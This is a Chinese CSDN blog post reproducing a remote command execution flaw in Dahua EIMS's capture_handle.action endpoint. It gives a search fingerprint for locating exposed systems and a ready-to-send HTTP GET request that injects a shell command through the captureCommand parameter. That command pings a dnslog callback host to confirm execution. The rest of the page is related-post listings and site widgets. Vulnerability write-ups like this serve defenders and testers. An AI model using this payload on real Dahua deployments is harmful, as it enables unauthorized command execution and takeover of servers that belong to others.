大华 EIMS-capture_handle.action接口存在远程命令执行漏洞

已于 2024-03-11 21:41:14 修改
阅读量438 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-11 21:41:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136636198
版权
本文介绍了大华EIMS系统中capture_handle.action接口存在的远程命令执行漏洞,详细阐述了漏洞描述,包括攻击者如何利用此漏洞获取服务器控制权限。并提供了测绘语法和漏洞复现步骤,如POC示例及请求dnslog的验证方法。
摘要由CSDN通过智能技术生成

漏洞描述

大华 EIMS-capture_handle.action接口存在远程命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。

测绘语法

title=”EIMS”

POC

GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20xxx.dnslog.cn%20index.pcap HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko

漏洞复现

请求dnslog
 


刷新dnslog

今天晚上早睡觉
关注
专栏目录
订阅专栏
漏洞复现】大华智慧园区综合管理平台ipms命令执行漏洞
晚风不及你
03-16 595
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智能物联综合管理平台 任意文件读取漏洞复现(QVD-2023-45063)
0xSec
02-01 826
大华ICC智能物联综合管理平台readpic接口存在任意文件读取漏洞,未经身份验证的攻击者 可以获取系统内部敏感文件信息,使系统处于极不安全的状态。
大华EIMS-capture_handle接口远程命令执行漏洞
qq_36334672的博客
03-14 609
大华EIMS CAPTURE_HANDLE接口允许远程命令执行
漏洞复现|大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞合集
weixin_44217321的博客
02-27 2243
大华智慧园区综合管理平台客户端由于前台缺少访问控制授权措施,可以从ip/WPMS进行定位,借助Payload进行漏洞触发,从而达到获取服务器数据的影响。大华园区综合管理平台/emap/webservice/gis/soap/bitmap接口存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令
命令执行漏洞远程命令执行和系统命令执行
bwxzdjn的博客
03-27 6019
用实验案例的方式讲解远程命令执行和系统命令执行两大漏洞利用方法。通过实践更深入地了解命令执行漏洞的成因和危害,更好地掌握web安全相关方面的知识。
网络安全-RCE(远程命令执行漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
10-05 1万+
目录 简介 原理 攻击 防御 参考 简介 RCE(remote command/code execute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想
eims_5.3_free.rar_4 3 2 1_EIMS_eims 5.3_手机优化
09-23
EIMS企业信息管理系统 5.3 版本更新说明:2012-04-25 1、优化重构了用户表与页面; 2、优化了数据库结构 3、优化了文章列表,提高了运行速度; 4、增加了系统设置; 5、修正了系统开关与时间错误; 6、修正了...
asp源码-EIMS抽奖系统eims-lot v1.1.zip
02-08
asp源码—EIMS抽奖系统eims_lot v1.1.zip asp源码—EIMS抽奖系统eims_lot v1.1.zip asp源码—EIMS抽奖系统eims_lot v1.1.zip asp源码—EIMS抽奖系统eims_lot v1.1.zip asp源码—EIMS抽奖系统eims_lot v1.1.zip asp...
2024年自学手册 网络安全(黑客技术)
2401_85027424的博客
10-31 718
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
11-01 618
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
【网络安全】|nessus使用
最新发布
yangdan_jiayou的博客
11-01 165
NFamily:Nessus 扫描插件的分类,用于将漏洞归类到不同的类别或家族中。CVSS:量化漏洞严重性的标准,通过计算得出一个分数,分数越高表示漏洞越严重。EPSS:预测漏洞被利用可能性的评分系统,帮助安全团队优先处理高风险的漏洞。VPR:基于风险的评分系统,帮助组织优先处理风险最高的漏洞。Sev:漏洞的严重性级别。
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
10-29 1629
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 922
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【热门主题】000012 网络幽灵的防线:探索新时代的网络安全策略
宝码香车的博客
10-28 1162
在当今数字化的时代,网络如同一张巨大的蜘蛛网,将世界紧密地连接在一起。它为我们带来了前所未有的便利和机遇,让信息得以在瞬间传递,让人们能够跨越时空进行交流与合作。
Juniper网络安全
swqd123456的博客
11-01 235
瞻博网络高级威胁防御 (ATP) 是网络的威胁情报中心,配备一系列内置的高级威胁服务,可借助 AI 和机器学习功能检测攻击并优化实施。Junos 以其高度可靠和可扩展的特性而闻名,具有丰富的网络功能和管理工具。3、SRX防火墙: SRX系列是Juniper的安全设备,用于提供高级网络安全功能,包括防火墙、 入侵检测和防御、 虚拟专用网络(VPN)和流量分析等。总而言之,Juniper提供了一系列的网络产品和解决方案,以满足企业和服务提供商的需求,并帮助他们构建和管理高性能、安全和可靠的网络基础设施。
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
ZXW_NUDT的博客
10-19 8927
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
网络安全(黑客)自学
白帽子凯哥聊黑客
10-27 1001
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
<a href = "http://localhost:8080/EIMS/contactManage/lookContact.jsp">合同查询</a>这段代码什么意思,是在本文件下跳转吗
06-13
这段代码是 HTML 中的一个超链接标签,其中 `href` 属性指定了链接的目标地址,这里是 `http://localhost:8080/EIMS/contactManage/lookContact.jsp`。当用户点击这个超链接时,浏览器会向服务器发送一个请求,请求该地址对应的资源(在这里是 `lookContact.jsp`),并在浏览器中展示该资源。这个链接是相对路径,所以它指向的是与当前页面相同的服务器地址下的 `contactManage` 目录下的 `lookContact.jsp` 文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值